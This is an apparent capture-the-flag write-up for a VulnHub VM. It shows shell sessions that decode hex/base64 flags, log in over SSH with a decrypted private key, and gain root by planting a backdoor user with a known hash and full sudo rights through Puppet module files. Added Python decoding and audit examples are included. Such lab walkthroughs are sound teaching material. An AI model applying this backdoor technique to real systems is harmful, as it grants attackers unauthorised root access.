drwx------  4 root root 4096 Jan  7 17:49 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
drwxr-xr-x  3 root root 4096 Dec 21 23:20 protovision
drwx------  2 root root 4096 Dec 21 23:19 .ssh
root@puppet:/root# cd .ssh
root@puppet:/root/.ssh# ls -la
total 8
drwx------ 2 root root 4096 Dec 21 23:19 .
drwx------ 4 root root 4096 Jan  7 17:49 ..
root@puppet:/root/.ssh# cd ..
root@puppet:/root# cd protovision/
root@puppet:/root/protovision# ls -la
total 12
-rw-r--r-- 1 root root 401 Dec 21 22:15 flag1.txt.0xff
-rw-r--r-- 1 root root  39 Dec 17 12:51 jim
-rw-r--r-- 1 root root  53 Dec 17 12:51 melvin
root@puppet:/root/protovision# cat flag1.txt.0xff 
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
root@puppet:/root/protovision# cat jim 
Mr Potato Head! Backdoors are not a...
root@puppet:/root/protovision# cat melvin 
Boy you guys are dumb! I got this all figured out...
root@puppet:/root/protovision# 

These are quotes from “WarGames”, an old movie.

The string 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861 is hexadecimal. Decoding it gives ==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyASbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02bj5SZiVHd19Weuc3d39yL6MHc0RHa, which is a base64 string written backwards (the == padding is at the front). Reversing it yields the base64 string aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1HZkpKazdpME5UayBJZiB0aGlzIGRvZXNuJ3Qgd29yaywgd2F0Y2ggV2FyZ2FtZXMgZnJvbSAyMyBtaW51dGVzIGluLCB5b3UgbWlnaHQgZmluZCBhIHBhc3N3b3JkIHRoZXJlIG9yIHNvbWV0aGluZy4uLg==, which decodes to:

https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...
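The decoding chain above (hex, then base64 written backwards, then base64) is a typical layered-encoding puzzle, so here is an added Python example, not the author's code, that peels such layers automatically and records each intermediate string; it is run on the flag1.txt.0xff contents quoted above. The heuristics are assumptions of this example: an even-length string of hex digits is tried as hex first, and a string that starts with '=' but does not end with it is taken to be base64 written backwards, because padding can only legitimately appear at the end.

```python
import base64
import binascii
import string

# Contents of flag1.txt.0xff as quoted above.
FLAG_HEX = "3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861"


def is_hex(s):
    """Even-length, non-empty, hex digits only (assumption: try hex before base64)."""
    return bool(s) and len(s) % 2 == 0 and all(c in string.hexdigits for c in s)


def looks_reversed_base64(s):
    """Base64 padding may only appear at the end, so a leading '=' without a
    trailing one is the tell-tale of a base64 string written backwards."""
    return s.startswith("=") and not s.endswith("=")


def peel(encoded, max_layers=8):
    """Peel hex / reversed / base64 layers until nothing decodes any more.

    Returns every intermediate string, outermost first; the last entry is the
    recovered text. The layer cap guards against pathological inputs."""
    history = [encoded]
    for _ in range(max_layers):
        cur = history[-1]
        if is_hex(cur):
            try:
                history.append(bytes.fromhex(cur).decode("ascii"))
                continue
            except UnicodeDecodeError:
                pass                      # hex, but not text: try the other layers
        if looks_reversed_base64(cur):
            history.append(cur[::-1])
            continue
        try:
            history.append(base64.b64decode(cur, validate=True).decode("utf-8"))
            continue
        except (binascii.Error, UnicodeDecodeError):
            break                         # plain text reached (or unknown encoding)
    return history


def decode_flag(hex_text):
    """Recovered plaintext for a flag encoded as in flag1.txt.0xff."""
    return peel(hex_text)[-1]


if __name__ == "__main__":
    for depth, layer in enumerate(peel(FLAG_HEX)):
        print(f"layer {depth}: {layer[:60]}{'...' if len(layer) > 60 else ''}")
```

Trying hex before base64 is a deliberate ordering: every hex digit is also a base64 character, so a hex string would otherwise be mis-decoded as base64 garbage; the reverse ambiguity (base64 that happens to be all hex digits) is rare enough that the ASCII-decode check catches most of it.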

I also find some files in the folder /root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z.

Following jim’s hint, I manage to decrypt the GPG file; the passphrase is secrets:

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat /root/protovision/jim
Mr Potato Head! Backdoors are not a...

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# gpg --output nleeson_key --decrypt nleeson_key.gpg
gpg: CAST5 encrypted data
gpg: gpg-agent is not available in this session
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ls -la
total 20
drwxr-xr-x 2 root root 4096 Apr 19 02:12 .
drwxr-xr-x 3 root root 4096 Dec 18 18:42 ..
---x------ 1 root root    7 Dec 18 15:34 my_world_you_are_persistent_try
-rw-rw-r-- 1 root root 1766 Apr 19 02:12 nleeson_key
-rw-r--r-- 1 root root 1420 Dec 21 22:10 nleeson_key.gpg
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat nleeson_key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16
[...]
-----END RSA PRIVATE KEY-----

Now I have a key to ssh into the third machine, 192.168.122.3, so I change the key’s permissions to 600 and use it to ssh into the machine. Surprisingly, the key asks for a passphrase. The second hint (melvin’s file) refers to the “Falken’s Maze” game. As I read on Wikipedia, there was a backdoor in this game, and the password was joshua. The same password is contained in the file my_world_you_are_persistent_try on the machine 192.168.122.2:

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# chmod 600 nleeson_key
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ssh nleeson@192.168.122.3 -i nleeson_key
Enter passphrase for key 'nleeson_key': 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

nleeson@barringsbank:~$ 

I can’t find anything unusual on the system, so I modify the puppet module’s files to create a new user called anthony with password testpass and add it to sudoers, so I can log in as a sudoer and read the shadow file to crack nleeson’s password hash.

I generate the password hash this way:

$ openssl passwd -1 -salt xyz testpass
$1$xyz$99Hw.JjOtHw5jCJCk0Uqs.

Then I modify the file /etc/puppet/modules/vulnhub/files/barringsbank-passwd, adding a line at the bottom of the passwd file:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
nleeson:x:1000:1000:Nicholas Leeson,,,:/home/nleeson:/bin/bash
puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
anthony:$1$xyz$99Hw.JjOtHw5jCJCk0Uqs.:1001:0:Anthony,,,:/home/anthony:/bin/bash

Then I modify the sudoers file on the path /etc/puppet/modules/vulnhub/files/sudoers:

root@puppet:/etc/puppet/modules/vulnhub/files# cat sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL
anthony	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

And on the machine with the IP 192.168.122.3 I run the puppet agent to update the machine, log in as anthony and become root:

nleeson@barringsbank:~$ puppet agent --server 192.168.122.2
nleeson@barringsbank:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
nleeson:x:1000:1000:Nicholas Leeson,,,:/home/nleeson:/bin/bash
puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
anthony:$1$xyz$99Hw.JjOtHw5jCJCk0Uqs.:1001:0:Anthony,,,:/home/anthony:/bin/bash
nleeson@barringsbank:~$ su - anthony
Password: 
No directory, logging in with HOME=/
anthony@barringsbank:/$ sudo su
[sudo] password for anthony: 
root@barringsbank:/# id
uid=0(root) gid=0(root) groups=0(root)
root@barringsbank:/# 

So, I’m root.
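The two artefacts that the Puppet run leaves behind are visible in the output above: a sudoers rule granting anthony ALL, and a passwd entry with the password hash stored inline and gid 0. As an added example (not from the original post or the VM), a small audit that flags both conditions, using constructed sample lines modelled on that output; the function names and the allow-list are my own choices.

```python
import re

# Constructed sample lines modelled on the /etc/passwd and sudoers output above
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
nleeson:x:1000:1000:Nicholas Leeson,,,:/home/nleeson:/bin/bash
puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
anthony:$1$xyz$99Hw.JjOtHw5jCJCk0Uqs.:1001:0:Anthony,,,:/home/anthony:/bin/bash
"""

SAMPLE_SUDOERS = """\
Defaults\tenv_reset
# User privilege specification
root\tALL=(ALL:ALL) ALL
anthony\tALL=(ALL:ALL) ALL
%sudo\tALL=(ALL:ALL) ALL
"""

def audit_passwd(text):
    """Return (account, reason) pairs for passwd entries that should not exist."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid = fields[0], fields[1], fields[2], fields[3]
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in ("x", "*", "!"):
            # A hash belongs in /etc/shadow; in passwd it is world-readable
            findings.append((name, "password hash stored in /etc/passwd"))
        if name != "root" and uid == "0":
            findings.append((name, "uid 0 on a non-root account"))
        if name != "root" and gid == "0":
            findings.append((name, "primary group is root (gid 0)"))
    return findings

def audit_sudoers(text, allowed=("root", "%sudo", "%admin")):
    """Return principals granted ALL commands that are not on the allow-list."""
    rule = re.compile(r"^(\S+)\s+ALL\s*=\s*\(.*\)\s*ALL\s*$")
    findings = []
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        m = rule.match(line)
        if m and m.group(1) not in allowed:
            findings.append(m.group(1))
    return findings

if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"passwd: {account}: {reason}")
    for principal in audit_sudoers(SAMPLE_SUDOERS):
        print(f"sudoers: unexpected full sudo grant for {principal}")
```

On a real host the same functions can be fed the contents of /etc/passwd and /etc/sudoers (plus /etc/sudoers.d), and the allow-list should hold the principals the Puppet manifest is actually expected to manage.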

I see this file me.jpeg. Since it’s the only file, I think it’s steganography.

After various attempts, I find out that the passphrase for getting the content is reticulatingsplines, from the file retrieved on the analoguepond machine.

$ steghide --info me.jpeg 
"me.jpeg":
  format: jpeg
  capacity: 11.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "primate_egyptian_flag.txt":
    size: 3.7 KB
    encrypted: rijndael-128, cbc
    compressed: yes

$ steghide extract -sf me.jpeg 
Enter passphrase: 
wrote extracted data to "primate_egyptian_flag.txt".
$ cat primate_egyptian_flag.txt

This is a hexadecimal string; I decode it and I get the following output:
[...]=oQZyFWb0h2Zp52St0CI

In here there’s the pattern gACI, which blocks the conversion from base64 to chars, so I delete the pattern and I retrieve the following:

gAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC
K8lLt0SLu8FIg4SLsACI
K4CYgcyJt4yXf5CXgBCI8BCI
f91Xf91Xf91Xf91Xf91Xu0zKrsCLgAiCcBCIg4CLgAyXgAyXgACX
90TP90TP90TP90TP90TP94ybv9mLfhCIKwHI8x3X89Fff91Xf91X8x3Xp81X
8BCIn4nfgoAfgwHf9wXP81TP90TP9wHf90TP
gwFIK8CIg8GIvByJ+BGIgAyJ+BCI
gcifgBCIK8CIg8GIvBCIcBmfvACI[...]=oQZyFWb0h2Zp52St0CI

At this point I reverse the strings, and this is what I get:

CkhlcmUncyBhIGZlbmRlciBiYXNzIGZvciB5b3UuLi4KCiAg
ICAsLS4gIF8uLS0tLl8K
ICB8ICBgXC5fXy4tJycgYC4K
XCAgXyAgXyAgLC4gICBcCiAgLCsrKz0uX19fX19fX19fX19fX19f
X18pX3x8X19fX19ffF98X3x8IHwKIChfLm9vby49PT09PT09PT09PT09PT09
PT09fHw9PT09PT18PXw9fHwgfAogfn4nICB8
ICB+JyAgIGB+JyBvIG8gIC8KIFwg
ICAvfmBcICBvIG8gIC8KICBgficg[...]IC0tS25pZ2h0bWFyZQo=

And then I decode the string from base64 to char:

Here's a fender bass for you...

    ,-.  _.---._
  |  `\.__.-'' `.
\  _  _  ,.   \
  ,+++=._________________)_||______|_|_|| |
 (_.ooo.===================||======|=|=|| |
 ~~'  |  ~'   `~' o o  /
 \   /~`\  o o  /
  `~' `-.____.-' 


Congratulations to you once again and for the sixth time on capturing this
flag! 

I've tried to mix things up a bit here, to move away from throw metasploit
and web exploits at things. I hope you have enjoyed that portion and your
feedback on this aspect would be appreciated.

Of note, these VMs are set to do automatic security updates using puppet,
so this ought to keep things dynamic enough for people.

Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.

A special thank you to g0tmi1k for hosting all these challenges and the
valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
me on IRC or twitter if you are looking for a hint or have completed the
challenge.

Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In
The North (C) BBC 1995.. What's the connection....?
  --Knightmare
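The whole decode chain (hex, reverse each line, base64) as an added Python example that is not part of the original post. It keeps the gACI groups instead of deleting them: reversed they read ICAg, which is the base64 of three spaces, so the banner's leading indentation survives. LINE_WIDTH, the helper names and the constructed sample are my own; the one real value is the closing hex of primate_egyptian_flag.txt.

```python
import base64

# The flag's base64 text was wrapped at 76 columns before each line was reversed
LINE_WIDTH = 76

def decode_flag(hex_text: str) -> str:
    """Hex -> reversed base64 lines -> base64 -> text, deleting nothing.

    Each line is reversed on its own: reversing the whole string would put the
    base64 lines in the wrong order. The 'gACI' groups are kept; reversed they
    are 'ICAg', the base64 of three spaces, so the art keeps its indentation.
    Whitespace in the hex (the 60-column wrapping of the dump) is ignored.
    """
    reversed_text = bytes.fromhex("".join(hex_text.split())).decode("ascii")
    b64 = "".join(line[::-1] for line in reversed_text.splitlines())
    return base64.b64decode(b64).decode("utf-8")

def encode_flag(plaintext: str) -> str:
    """Inverse of decode_flag, added only to build test inputs:
    base64, wrap at LINE_WIDTH, reverse each line, then hex-encode."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    lines = [b64[i:i + LINE_WIDTH] for i in range(0, len(b64), LINE_WIDTH)]
    return "".join(line[::-1] + "\n" for line in lines).encode("ascii").hex()

if __name__ == "__main__":
    # Constructed sample: a banner with leading spaces, long enough to need
    # two wrapped base64 lines, so the per-line reversal is exercised.
    sample = "Here's a fender bass for you...\n\n    ,-.  _.---._\n   |  `\\.__.-'' `.\n"
    wire = encode_flag(sample)
    assert decode_flag(wire) == sample
    # Closing bytes of the real flag file, taken from the hex dump of
    # primate_egyptian_flag.txt: they decode to the signature line
    print(repr(decode_flag("3d6f515a794657623068325a70353253743043490a")))
```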

I really enjoyed the usage of Puppet in this VM, it’s been quite nice and it shows how much damage it could do if used wrongly.

Thank you to knightmare for the VM and Vulnhub for hosting it.